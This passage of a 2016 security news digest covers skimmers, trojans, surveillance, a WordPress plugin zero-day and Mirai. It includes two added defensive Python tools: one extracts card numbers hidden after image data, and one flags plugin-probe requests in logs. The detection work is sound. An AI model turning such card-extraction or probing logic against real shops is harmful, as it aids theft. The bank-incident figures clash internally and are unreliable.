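A site owner can check for this hiding place without waiting for the next swiper: a real image ends at a well-defined marker, so any bytes after it are suspect. The following is an added example (not code from Sucuri or RiskIQ) that locates the true end of a JPEG by walking its marker segments, so that an EXIF thumbnail's own end marker does not fool it, and, going beyond the article, does the same for PNG by walking chunks to IEND. Anything after the end is scanned for Luhn-valid 13 to 19 digit runs and reported masked. The sample images are constructed in the code; the card numbers are standard test numbers, not data from the incident.

```python
# Added example (not code from Sucuri or RiskIQ): find data appended after the
# real end of an image, the hiding place described above, and pull out anything
# that looks like a card number. Handles JPEG (walks the marker segments, so an
# EXIF thumbnail's own EOI does not fool it) and, beyond the article, PNG (walks
# the chunks to IEND). Sample images below are constructed, not real files.
import re
import struct
from typing import List, Optional


def jpeg_end(data: bytes) -> Optional[int]:
    """Offset just past the EOI (FFD9) marker of a JPEG, or None if malformed."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while True:
        idx = data.find(b"\xff", pos)
        if idx < 0 or idx + 1 >= len(data):
            return None
        marker = data[idx + 1]
        if marker == 0xD9:                                  # EOI: the image ends here
            return idx + 2
        if marker == 0x00 or 0xD0 <= marker <= 0xD7 or marker == 0xFF:
            pos = idx + 1                                   # stuffed byte, RSTn or fill: not a segment
            continue
        if idx + 4 > len(data):
            return None
        seg_len = struct.unpack(">H", data[idx + 2:idx + 4])[0]
        pos = idx + 2 + seg_len                             # skip the payload (it may contain FFD9 itself)


def png_end(data: bytes) -> Optional[int]:
    """Offset just past the IEND chunk's CRC, or None if malformed."""
    if not data.startswith(b"\x89PNG\r\n\x1a\n"):
        return None
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length                                  # length + type + data + CRC
        if ctype == b"IEND":
            return pos
    return None


def appended_data(data: bytes) -> bytes:
    """Bytes after the image proper (empty for a clean image)."""
    end = jpeg_end(data) if data[:2] == b"\xff\xd8" else png_end(data)
    return b"" if end is None or end > len(data) else data[end:]


def luhn_ok(digits: str) -> bool:
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


PAN_RE = re.compile(rb"(?<!\d)\d{13,19}(?!\d)")


def find_pans(blob: bytes) -> List[str]:
    """Luhn-valid 13 to 19 digit runs in the blob, masked to first six / last four."""
    hits = []
    for m in PAN_RE.finditer(blob):
        s = m.group().decode("ascii")
        if luhn_ok(s):
            hits.append(s[:6] + "*" * (len(s) - 10) + s[-4:])
    return hits


def scan_image(data: bytes) -> dict:
    tail = appended_data(data)
    return {"trailing_bytes": len(tail), "pans": find_pans(tail)}


# Constructed minimal JPEG: SOI, APP0, SOS header, a few entropy bytes holding a
# stuffed FF00 and an RST0 marker, then EOI. 39 bytes in total.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\xff\x00\x34\xff\xd0\x56"
    + b"\xff\xd9"
)
# Constructed minimal PNG: signature, an IHDR chunk (CRC not checked here), IEND. 45 bytes.
CLEAN_PNG = (
    b"\x89PNG\r\n\x1a\n"
    + struct.pack(">I", 13) + b"IHDR" + b"\x00" * 13 + b"\x00" * 4
    + struct.pack(">I", 0) + b"IEND" + b"\xaeB`\x82"
)
# The JPEG with a constructed swiper dump appended in clear text
# (test card numbers; the 13-digit run fails Luhn and is ignored).
POISONED_JPEG = CLEAN_JPEG + (
    b"4111111111111111|12/19|123|John Doe|US\n"
    b"4242424242424242|01/20|999|Jane Roe|JP\n"
    b"1234567890123|junk\n"
)

if __name__ == "__main__":
    print(scan_image(CLEAN_JPEG))
    print(scan_image(POISONED_JPEG))
```

Run it over the media directory of the shop; a non-zero `trailing_bytes` on a product image is worth a look even when no card number is found, since the swiper may encode or compress the dump.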
Sucuri urges owners of websites powered by Magento to keep their CMS up to date and apply all the latest patches.
It also urges website administrators to use strong, unique passwords.
You are collecting data on people illegally, court tells secret services
19.10.2016 SecurityWorld Cyber
Almost every state very probably collects data on its own citizens. The question is how transparent this activity is; a court ruling in the United Kingdom may, however, be the first sign of a gradual admission of espionage against a state's own citizens.
A court in the United Kingdom has ruled that the years-long collection of almost all information about citizens' communications (with the exception of the content of the communication itself) violated the European Convention on Human Rights.
Following the government's public admission of the activity, however, the collection has become lawful, says the Investigatory Powers Tribunal, an independent body that handles complaints against the intelligence agencies. The tribunal has yet to decide whether the breadth of the information gathered can be justified and whether the agencies' conduct was proportionate to the threats they were trying to eliminate.
On the basis of a complaint filed by Privacy International in June 2015, the tribunal agreed that the UK intelligence services had indeed, for many years, violated the European Convention on Human Rights through the way they collected personal information about the country's citizens on a massive scale.
The data include who contacted whom, when, where and by what means, who paid for the call and how much. "Practically the only information the agencies did not collect is the content itself," the court writes in its verdict. Lawful collection of such information would require a warrant targeting the subject concerned.
In principle, the government can authorise the intelligence services to collect communications data from mobile and Internet operators under a law from 1984 (by coincidence, the year the act was passed matches the title of George Orwell's dystopian novel, which deals, among other things, with exactly the question of "Big Brother", that is, state surveillance of citizens).
Whether the data collection and its breadth were necessary is an entirely different question: when the act was passed in 1984, the tribunal notes, neither mobile phones nor the Internet existed.
Besides data relating directly to communications, the agencies also collected personal information: passport databases, telephone directories, bank records. According to statements by the secret services during the proceedings, however, the majority of citizens are of no interest for the agencies' purposes.
British legislation does not specify rules for the mass collection of personal data, the tribunal adds. Information about the intelligence services' activity only surfaced in March 2015; the government subsequently admitted to the surveillance in November of the same year.
According to the tribunal, the data collection became lawful after the government's admission because it is now "foreseeable". Citizens can foresee that someone is watching them and must therefore reckon with the consequences of their actions.
"It is unacceptable that it is only through a civil court case brought by a charity that we have learnt the extent of [the secret services'] powers and how they use them," says Millie Graham Wood, a lawyer at Privacy International. She also called on the agencies to publicly confirm that the illegally obtained personal data will be destroyed.
In these turbulent times, however, we can only dream of an end to the practice of collecting data on citizens. On the contrary: as new technologies develop, the state will have even more tools at its disposal with which to monitor its citizens.
Malicious virus tries to obtain the user's photo and payment card details
18.10.2016 Novinky/Bezpečnost Viruses
Users should beware of a newly discovered piece of malicious code that can wreck their budget, quite literally: through this uninvited guest, cybercriminals try to lure sensitive data out of the unwary. The threat was flagged by security experts at the antivirus company Kaspersky Lab.
The Acecard virus spreads mainly through social networks and e-mails, more precisely via links to fraudulent websites that promise some interesting video. There the user is prompted to install an update of Adobe Flash Player, the plug-in needed to play the video.
Instead of the update, the unwary download the uninvited guest onto their device. It should be noted that the newly discovered threat currently attacks exclusively smartphones running the Android operating system.
The virus lies in wait on the phone
There the virus waits for its opportunity. It activates only when the user launches an application that can work with a credit card, that is, the various Internet banking and online shopping apps.
Once such an app is launched, a message appears on the touchscreen saying that payment card details, including the verification data, must be entered. The unwary may mistakenly believe they are entering the data into the well-known application, but in reality they are handing it to the fraudsters on a silver platter.
"The window requesting the sensitive data is displayed over the legitimate applications. Less attentive users therefore have little chance of noticing that it is a scam," warned McAfee security expert Bruce Snell.
The attackers are not satisfied with card details alone. "After copying the numbers from the card, the cybercriminals ask for further supplementary information. They want a name, address, date of birth and even a current photo with an ID card," Snell added.
Empties the account, takes out a loan
Computer pirates can abuse all this data not only to empty someone else's account but, for example, to take out a loan in the account holder's name. The threat should therefore not be underestimated, because cybercriminals can deprive users even of money they do not have in their account.
Of course, many banks today use various verification systems intended to prevent such abuse. For example, card payments must be additionally confirmed by SMS message. But since the attackers already control the smartphone, intercepting the confirmation messages poses no problem for them either.
So far, the Acecard virus has spread mainly on Asian computer networks. It is not excluded, however, that cybercriminals will also deploy it in Europe, or even in the Czech Republic.
VeraCrypt Audit Reveals Critical Security Flaws — Update Now
18.10.2016 thehackernews Vulnerability
After TrueCrypt was mysteriously discontinued, VeraCrypt became the most popular open source disk encryption software used by activists, journalists and privacy-conscious people.
First of all, there is no such thing as perfect, bug-free software.
Even the most rigorously tested software, such as the software that runs SCADA systems, medical devices and aircraft, has flaws.
Vulnerabilities are an unfortunate reality for every software product, but there is always room for improvement.
Due to the enormous popularity of VeraCrypt, the OSTIF (Open Source Technology Improvement Fund) agreed to have VeraCrypt audited independently and in August hired researchers from Quarkslab to lead the audit.
And it seems that VeraCrypt is not exactly flawless either.
Now, after a month-long audit, the researchers have reported a number of security issues in VeraCrypt: 8 critical, 3 medium and 15 low-severity vulnerabilities.
Quarkslab senior security researcher Jean-Baptiste Bédrune and senior cryptographer Marion Videau analyzed the VeraCrypt version 1.18 and the DCS EFI Bootloader 1.18 (UEFI), mainly focusing on new features introduced since last year's TrueCrypt security audit.
VeraCrypt file encryption software has been derived from the TrueCrypt project, but with enhancements to further secure your data.
"VeraCrypt is a project hard to maintain," researchers said. "Deep knowledge of several operating systems, the Windows kernel, the system boot chain and good concepts in cryptography are required. The improvements made by IDRIX demonstrate the possession of these skills."
The researchers have detailed all the vulnerabilities in a 42-page audit report [PDF], which includes:
Critical bugs in the implementation of GOST 28147-89, a symmetric block cipher with a 64-bit block size, which they say must be removed completely due to unsafe implementation.
All compression libraries are considered outdated or "poorly-written," and must be replaced with modern and more secure zip libraries.
If the system is encrypted, the boot password in UEFI mode or its length can be determined.
The majority of the flaws have been fixed in the latest VeraCrypt release, version 1.19, but a few, including issues in the AES implementation, remain unpatched because fixing them requires substantial modifications to the code and/or the architecture of the project.
So, according to the OSTIF, "VeraCrypt is much safer after this audit, and the fixes applied to the software mean that the world is safer when using this software."
You are recommended to download the latest VeraCrypt version 1.19.
British banks downplay security breaches
18.10.2016 securityaffairs Crime
Banks and financial institutions in the UK are reportedly failing to disclose the full extent of the security breaches they are experiencing.
UK banks are reportedly failing to disclose the full extent of the number and nature of security incidents they experience, out of fear of financial penalties and negative publicity.
Banking executives and security experts have stated that the banks use grey areas in the reporting rules to downplay the extent to which they are targeted on a daily basis.
According to the UK's financial regulator, the FSA, to which banks are obliged to report every incident, only 75 incidents were reported last year, a figure it disclosed last month.
This is in itself a marked increase from the 27 declared in 2015 and the 5 in 2014. Anyone active in the security industry will recognise these figures as unrealistically low given today's threat and malware environment.
"Banks are dramatically under-reporting attacks, they do what's legally required but out of embarrassment or fear of punishment they aren't giving the whole picture," claimed an anonymous source in the banking sector's cyber security space.
Mark James, a security specialist from ESET stated “Reporting every one of those attempts would indeed clog systems with lots of unnecessary information and I’m sure there will be a lot that never makes the light of day,”
He went on to add “However, the problem of course is perceived security, as more and more breaches happen and more malware is being used to target financial systems, then the damage caused when things go wrong can be so great decisions will be made to keep it quiet. However, with the public becoming more aware of the damage caused by lapsed security, this may influence the decision on who is to look after their savings and daily finances in the future.”
These figures may be set to change, as the reporting requirements are expected to be tightened by the imminent EU General Data Protection Regulation (GDPR), which introduces a mandatory reporting regime that all UK banks and lenders will be compelled to comply with.
It will require mandatory notification of security breaches within 72 hours and introduces the possibility of fines of up to £18M or 4% of annual turnover for what is deemed serious non-compliance.
Crooks exploit a zero-day in WordPress eCommerce Plugin to upload a backdoor
18.10.2016 securityaffairs Vulnerability
Experts from White Fir Design discovered that cybercriminals exploited a zero-day flaw in an e-commerce plugin for WordPress to upload a backdoor.
According to experts from the firm White Fir Design, crooks exploited a zero-day flaw in an e-commerce plugin for WordPress to upload backdoors to affected websites.
The plugin is WP Marketplace, a plugin for the popular WordPress CMS that implements e-commerce features. The plugin is not widely used, being installed on fewer than 500 websites worldwide, and the bad news is that it is no longer maintained, so the security holes will never be patched. WP Marketplace has not been updated in the last eight months, and last week it was removed from the official WordPress Plugin Directory.
The experts noticed requests for a particular file belonging to the flawed WP Marketplace plugin and determined that they were a scan for websites running the plugin, carried out in order to exploit the flaw.
The issue is an arbitrary file upload vulnerability, as the experts explain.
“Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor as well.” reads the analysis published by White Fir Design. “Seeing as arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case, we quickly found one. In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is made accessible when loading admin pages (as the function is_admin() tells you that, not if the user is Administrator)”
Researchers from the security firm Sucuri also observed attack attempts in the wild and confirmed that cybercriminals have been exploiting the arbitrary file upload vulnerability to upload a backdoor to the affected websites.
“We checked our Website Firewall logs and confirmed that the WP Marketplace vulnerability is now a part of a hacker’s toolkit. When they detect sites with the installed plugin, they try to exploit the vulnerability and upload backdoors.” states a blog post published by Sucuri.
“Of course, it is not as valuable for hackers as vulnerabilities in popular plugins installed on every other site, but if your toolkit comprises hundreds of smaller vulnerabilities, the success rate will be comparable,” said Sucuri’s Denis Sinegubko. “That’s why plugin developers shouldn’t neglect best security practices even when developing small plugins.”
The experts from White Fir Design pointed out that the same development team also distributed other plugins, including WordPress Download Manager, which has been affected by a file upload flaw since at least June and is still unpatched.
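The probe White Fir Design describes, a request for a plugin asset on a site that does not run that plugin, is easy to spot in ordinary access logs, and it generalises to any plugin. Below is an added example (not code from White Fir Design or Sucuri) that parses combined-format web server log lines, flags the exact WP Marketplace probe path quoted above, flags 404s for assets of any plugin not in the site's installed set as fingerprinting, and marks any later POST from a client that has already probed. The log lines, client addresses and the installed plugin set are constructed; the POST target in the sample is a placeholder and not the plugin's exploit path, which the article does not give.

```python
# Added example (not code from White Fir Design or Sucuri): run the detection
# described above over web server access logs. A request for a file belonging to
# a plugin that is not installed is a fingerprinting probe; a POST from the same
# client afterwards is worth a closer look. Log lines and IPs are constructed;
# the POST target is a placeholder, not the plugin's exploit path.
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
PLUGIN_RE = re.compile(r"^/wp-content/plugins/(?P<plugin>[^/]+)/")
PROBE_PATH = "/wp-content/plugins/wpmarketplace/css/extends_page.css"   # path from the White Fir write-up


def parse(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_probes(lines: List[str], installed: Set[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Per-client findings, in log order:
       wpmarketplace-probe  the exact path the attackers were seen requesting
       plugin-fingerprint   a 404 for an asset of a plugin this site does not run
       post-after-probe     any POST from a client that already probed us"""
    findings: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    probed: Set[str] = set()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if rec["method"] == "POST" and ip in probed:
            findings[ip].append(("post-after-probe", rec["path"]))
            continue
        pm = PLUGIN_RE.match(rec["path"])
        if pm is None:
            continue
        if rec["path"] == PROBE_PATH:
            findings[ip].append(("wpmarketplace-probe", rec["path"]))
            probed.add(ip)
        elif pm["plugin"] not in installed and rec["status"] == "404":
            findings[ip].append(("plugin-fingerprint", pm["plugin"]))
            probed.add(ip)
    return dict(findings)


# Constructed access log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Oct/2016:10:01:02 +0000] "GET /wp-content/plugins/wpmarketplace/css/extends_page.css HTTP/1.1" 404 231 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Oct/2016:10:01:03 +0000] "GET /wp-content/plugins/some-other-plugin/readme.txt HTTP/1.1" 404 231 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [17/Oct/2016:10:02:00 +0000] "GET /wp-content/plugins/akismet/_inc/akismet.css HTTP/1.1" 200 1420 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Oct/2016:10:01:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 15 "-" "Mozilla/5.0"',
]
INSTALLED_PLUGINS = {"akismet"}   # what this site actually runs; constructed for the demo

if __name__ == "__main__":
    for client, events in find_probes(SAMPLE_LOG, INSTALLED_PLUGINS).items():
        print(client, events)
```

The exact-path rule fires whether or not the plugin is installed, which is the point: a 200 on that path means the site still runs an abandoned plugin with an unpatched upload flaw and the request was a prelude, not a dead end.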
Shadow Brokers launched a crowdfunding campaign to raise 10,000 bitcoins
18.10.2016 securityaffairs APT
The group calling itself The Shadow Brokers, which hacked the NSA-linked Equation Group, has announced a crowdfunding campaign for the stolen arsenal.
This summer the hacker group Shadow Brokers breached the NSA-linked group known as the Equation Group and leaked 300 MB of hacking tools, exploits and implants.
The Shadow Brokers then launched an all-pay auction for the full archive containing the entire arsenal of the Equation Group. In early October, The Shadow Brokers complained that no one had offered money for their precious archive.
The auction attracted offers worth less than two bitcoins, so the group decided to launch a crowdfunding campaign instead.
The Shadow Brokers had collected bids totalling 1.76 bitcoins (roughly $1,100), while the dreaded team was expecting to earn as much as $1 million.
Perhaps the hackers' intent was misunderstood, though, because their crowdfunding campaign aims to raise 10,000 bitcoins (roughly $6.4 million).
“TheShadowBrokers is being bored with auction so no more auction. Auction off. Auction finish. Auction done. No winners. So who is wanting password? TheShadowBrokers is publicly posting the password when receive 10,000 btc (ten thousand bitcoins). Same bitcoin address, same file, password is crowdfunding. Sharing risk. Sharing reward. Everyone winning.” reads the announcement published by the group.
So far, however, the crowdfunding campaign is not achieving the expected results.
Who is behind the Shadow Brokers crew?
Some experts speculate that it is a Russian state-sponsored group; others believe it is a group of hackers that simply found the arsenal after an NSA employee or contractor mistakenly left it unattended on a remote server.
The Shadow Brokers would then have discovered the server and raided it.
“NSA officials have told investigators that an employee or contractor made the mistake about three years ago during an operation that used the tools, the people said.” Reuters reported.
“That person acknowledged the error shortly afterward, they said. But the NSA did not inform the companies of the danger when it first discovered the exposure of the tools, the sources said. Since the public release of the tools, the companies involved have issued patches in the systems to protect them.”
UK Police purchased IMSI-catcher technology for mobile surveillance
17.10.2016 securityaffairs Mobil
According to documents analyzed by the Bristol Cable media outlet, UK police forces have purchased IMSI-catcher equipment.
Privacy advocates and rights groups are protesting UK law enforcement's purchase of mobile phone snooping technology.
The rights groups object to the adoption of IMSI-catcher technology, which can be used for dragnet surveillance.
An IMSI-catcher is a surveillance device used to intercept mobile phone traffic and calls, track the movements of mobile phone users and block phones from operating.
An IMSI-catcher mounts a man-in-the-middle (MITM) attack, acting as a bogus cell tower that sits between the target mobile phone and the service provider's real towers.
UK police purchased this mobile phone snooping technology to track suspects' devices and intercept their communications as part of investigations.
The problem is that devices such as IMSI-catchers indiscriminately monitor mobile devices over a radius of up to 8 km, representing a serious threat to users' privacy.
Rights groups are demanding transparency from the police about the use of surveillance technology.
According to the Bristol Cable, UK police forces are using Stingray-type equipment in their operations. They have reportedly purchased “covert communications data capture” (CCDC) equipment from a UK firm, Cellxion.
One budget line, “IMSI Covert Communications”, was earmarked £144,000; in the same budget the “CCDC” item was allocated the same amount, £144,000.
“South Yorkshire police confirmed that ‘CCDC’ and ‘IMSI Covert Communications’ are the same budget item.”
According to invoices obtained by the Cable, the local UK police paid Cellxion £169,575.00 for CCDC equipment, as well as other “communications and computing equipment.”
“Suspicions have been raised in the past that IMSI-catchers are in use in the UK. These suspicions, until now, have focused on the Metropolitan Police’s purchase and use of the technology. Now, the Cable can exclusively reveal that at least five other forces appear to have contracted for IMSI-catchers, including Avon and Somerset (A&S) Constabulary.” revealed The Bristol Cable “This revelation comes from decrypting for the first time the acronym – CCDC, standing for covert communications data capture – in use by police forces across the country to obscure their apparent purchase of IMSI-catchers, and identifying police contracts with Cellxion, a firm that manufactures them.”
Privacy International advocacy officer Matthew Rice condemned the lack of transparency over the use of IMSI-catcher technology. Now that the acronyms used by the police are known, it is important to establish how the surveillance technology is really used.
“While journalists and activists [have] spent time requesting information about IMSI-catchers… the real question we should have been asking our police forces was about the term CCDC (covert communications data capture),” he says.
“The longer the policy of denial of existence of these capabilities go on, the worse it is for police, citizens, and civil liberties in the United Kingdom,” he says.
It is still unclear whether the UK police and intelligence agencies have used IMSI-catchers and in which kind of operations.
The new TrickBot Banking Trojan seems to have been developed by Dyre authors
17.10.2016 securityaffairs Virus
Researchers at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan is now behind the new TrickBot malware.
This morning I published a post on the crime trend data provided by Group-IB; the report published by the security firm reveals a continuous evolution of the cybercriminal ecosystem. The story I am about to tell you confirms this rapid evolution: at least one of the authors behind the infamous Dyre banking Trojan (aka Dyreza) is apparently working on a new banking Trojan dubbed ‘TrickBot.’
The Dyreza botnet infected hundreds of thousands of machines worldwide; according to Heimdal Security, by November 2015 more than 80,000 machines had already been infected with the Dyre Trojan across the world. Security experts estimated that customers of more than 1,000 financial institutions had fallen victim to the threat.
In November 2015 Dyre activity ceased; Reuters also reported that authorities had raided the offices of a Russian film distribution and production company as part of an operation against the Dyre gang.
The operation of the Russian police successfully beheaded the organization behind the Dyre Trojan.
“We have seen a disruption over the last few months that is definitely consistent with successful law enforcement action,” explained security expert John Miller from iSight Partners.
Now security experts at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan escaped arrest and is now participating in a new project.
Researchers at Fidelis Cybersecurity that are monitoring the evolution of the TrickBot malware speculate it has a strong connection to Dyre banking trojan.
The security firm first spotted the TrickBot malware in September while it was used by crooks to target the customers of Australian banks (ANZ, Westpac, St. George and NAB).
The first TrickBot samples analyzed by the experts were implementing a single data stealer module, but a few weeks later, the researchers discovered a new sample including webinjects that appear to be in the testing phase.
“In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has a strong connection to the Dyre banking trojan. From first glance at the loader, called TrickLoader, there are some striking similarities between it and the loader that Dyre commonly used. It isn’t until you decode out the bot, however, that the similarities become staggering.” reads the analysis published by Fidelis Cybersecurity.
“This would suggest, but is far from conclusive, that some individuals related to the development of Dyre have found their way into resuming criminal operations.”
TrickBot and Dyre have many similarities; the new banking trojan's code appears to have been rewritten in a different coding style while retaining much of the functionality.
TrickBot contains more C++ code than Dyre, which is mostly written in C. Another difference is that the new trojan relies on the Microsoft CryptoAPI instead of built-in routines for AES and SHA-256 hashing.
The main differences highlighted in the analysis:
Instead of running commands directly the bot interfaces with TaskScheduler through COM for persistence
Instead of running an onboard SHA256 hashing routine or AES routine the bot utilizes Microsoft CryptoAPI
There is considerably more code in the C++ programming language versus the original Dyre that used C for the most part.
“Based on these observations, it is our assessment with strong confidence that there is a clear link between Dyre and TrickBot but that there is considerable new development that has been invested into TrickBot. With moderate confidence, we assess that one or more of the original developers of Dyre is involved with TrickBot.” states the post.
The analysis of the custom crypter revealed that the loader (TrickLoader) is the same one used by other malware such as Vawtrak, Pushdo and Cutwail. Cutwail is the spambot used by the threat actor behind Dyre, which suggests that the cybercriminals are trying to rebuild the Cutwail botnet.
For further information, see the Fidelis post, which includes a full list of IOCs and hashes.
‘Adult’ video for Facebook users
17.10.2016 Kaspersky Social
In April of this year we observed mass attacks on Facebook users in Russia, and many Russian-speaking users of the social network fell victim to the fraudsters. Half a year later the fraudsters have used the same tactics against Facebook users in Europe.
The attackers use a compromised Facebook account to post a link to an adult video supposedly hosted on the popular YouTube service. To attract potential victims, “likes” are added from the account holder’s list of friends. The fraudsters count on the user or their friends being curious enough to want to watch an “18+” video.
Clicking on the link opens a page made to look like YouTube.
However, a quick look at the address bar is enough to see that the page has nothing to do with YouTube. During the latest attack the fraudsters distributed a “video” located on the xic.graphics domain. The domain is not currently available, but we discovered more than 140 domains with the same registration data that can be used for similar purposes.
After trying to start the video, a pop-up banner appears prompting the user to install a browser extension. In this particular example, it was called ‘Profesjonalny Asystent’ (Professional assistant), but we also came across other names.
The “View details” message explains that if the extension is not installed, the video cannot be viewed.
The attackers are banking on an intrigued victim not being interested in the details and just installing the extension. As a result, the extension gains rights to read all the data in the browser, which the fraudsters can later use to get all the passwords, logins, credit card details and other confidential user information that is entered. The extension can also continue spreading links to itself on Facebook, but now in your name and among your friends.
We strongly recommend not clicking such links and not installing suspicious browser extensions. It’s also worth checking if any suspicious extensions have already been installed. If any are discovered, they should be immediately removed via the browser settings, and the passwords for sites that are visited most often, especially online banking, should be changed.
Windows, Internet Explorer and Office have critical security flaws
17.10.2016 Novinky/Bezpečnost Vulnerabilities
Several critical flaws have been uncovered in Microsoft software products. The holes were found in the Windows operating system, the Internet Explorer and Edge browsers, and also in the Office suite. The American software giant has, however, already released fixes for all the vulnerabilities.
The discovered flaws are very dangerous because, according to The Hacker News, it turned out that computer pirates were able to exploit them before the patches were released.
Through them, attackers could run practically arbitrary malicious code on someone else's computer. They could likewise access the settings of the compromised machine or the data stored on its hard disk. A total of five security patches were released for the critical vulnerabilities.
Administrator vs. user account
Interestingly, through these holes attackers could only gain the rights that the user themselves had. Cybercriminals could thus take control of the affected system only if the user was working on the machine with administrator rights.
Unfortunately, many users do exactly that in practice. The newly discovered flaws thus show once again how dangerous it is to use an administrator account for everyday work. It is far better to create several accounts on the computer, not only in companies but also at home, and routinely use only those with standard user privileges.
An account with administrator rights should be used only when it is truly necessary.
Important fixes
Besides the fixes for the critical flaws, the American computer giant also released several important updates that serve mainly to improve the functionality of the system itself, but also, for example, of the Office suite. These do not pose any great security risk to users.
All the patches for critical and important holes, released together with the regular batch of updates, can be downloaded through Windows Update.
Users who do not have automatic installation of updates enabled should not delay downloading them. Otherwise they leave a back door into their computers open for computer pirates.
The Mirai botnet is targeting also Sierra Wireless cellular data gear products
16.10.2016 securityaffairs BotNet
Sierra Wireless is warning its customers to change the factory credentials of its AirLink gateway communications products because of Mirai attacks.
Sierra Wireless is warning its customers to change the factory credentials of its AirLink gateway communications products.
The company is aware of a significant number of infections caused by the Mirai malware, a threat specifically designed to compromise poorly configured IoT devices.
The malware was first spotted in August by MalwareMustDie researchers, who analyzed samples of this new ELF trojan backdoor. The malware takes its name from the binary, “mirai.*”, and according to the experts several attacks have been detected in the wild.
The Mirai malware scans the Internet for connected devices such as DVRs and IP-enabled cameras that use default or hard-coded credentials.
Back to the Sierra Wireless alert: the company is warning its customers of Mirai attacks against the AirLink Cellular Gateway devices (LS300, GX400, GX/ES440, GX/ES450 and RV50).
“Sierra Wireless has confirmed reports of the ‘Mirai’ malware infecting AirLink gateways that are using the default ACEmanager password and are reachable from the public internet. The malware is able to gain access to the gateway by logging into ACEmanager with the default password and using the firmware update function to download and run a copy of itself,” Sierra Wireless wrote in a security bulletin. “Devices attached to the gateway’s local area network may also be vulnerable to infection by the Mirai malware.”
The Mirai botnet has been involved in a number of severe attacks; according to the experts it powered the DDoS attacks against the website of investigative journalist Brian Krebs and against the hosting provider OVH, the latter reaching 1 Tbps.
Unfortunately, the number of malware families specifically designed to infect IoT systems continues to increase. This week, Security Affairs exclusively reported the discovery by experts at MalwareMustDie of a new threat dubbed NyaDrop.
“There is evidence that ‘Internet of Things’-type devices have been infected with the Linux malware Mirai, which attackers used in the recent DDoS attacks against the web site Krebs on Security,” reads a security bulletin published by the US ICS-CERT.
US is thinking of a possible cyber strike against the Kremlin
16.10.2016 securityaffairs Cyber
The US Government is thinking of a possible cyber strike against the Kremlin in response to the alleged interference with the 2016 presidential election.
A few days ago the US Government formally accused the Russian Government of trying to interfere in the 2016 Presidential Election.
Washington is officially accusing Russia of trying to interfere with the 2016 US presidential election, announcing it will adopt all necessary countermeasures to defeat the threat.
The Office of the Director of National Intelligence and the Department of Homeland Security have issued a joint security statement to accuse the Russian government of a series of intrusions into the networks of US organizations and state election boards involved in the Presidential Election.
“The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process” reads the statement.
“We will take action to protect our interests, including in cyberspace, and we will do so at a time and place of our choosing,” a senior administration official told AFP.
“The public should not assume that they will necessarily know what actions have been taken or what actions we will take.”
On Friday, US Vice President Joe Biden, in an interview with NBC, explained that a "message" would be sent to Russian President Vladimir Putin over the alleged hacking.
"Vice President Joe Biden told "Meet the Press" moderator Chuck Todd on Friday that "we're sending a message" to Putin and that "it will be at the time of our choosing, and under the circumstances that will have the greatest impact,"" NBC News reported.
“When asked if the American public will know a message was sent, the vice president replied, “Hope not.“”
According to NBC, the CIA was preparing a retaliatory cyber attack “designed to harass and ’embarrass’ the Kremlin leadership.”
“The Obama administration is contemplating an unprecedented cyber covert action against Russia in retaliation for alleged Russian interference in the American presidential election”
Yes, but what does it mean to contemplate a covert operation when diplomats shout revenge in public? Clearly, US politicians are using the cyber threat as a deterrent against further initiatives by the Kremlin.
These statements are useless: both governments are already conducting covert operations against their adversary, and history is full of examples.
According to NBC News, the sources did not elaborate on the tactics the CIA was considering, but said US intelligence is already selecting targets and making other preparations for a cyber operation.
Former intelligence officers explained that the CIA is likely working on a PSYOP by gathering reams of documents that could expose "unsavory tactics" by President Vladimir Putin.
On the other side, the Russian Government denies any interference with the 2016 Presidential election; Kremlin spokesman Dmitry Peskov replied to Biden's statements saying that his Government would take precautions to protect itself from the "unpredictability and aggressiveness of the United States."
“The threats directed against Moscow and our state’s leadership are unprecedented because they are voiced at the level of the US vice president,” reported the Russian RIA Novosti news agency.
“To the backdrop of this aggressive, unpredictable line, we must take measures to protect (our) interests, to hedge risks.”
Intelligence analysts believe that the two governments will intensify their operations in cyberspace; the Russian diplomat Yuri Ushakov vowed Moscow would respond to any cyber attacks launched by Washington.
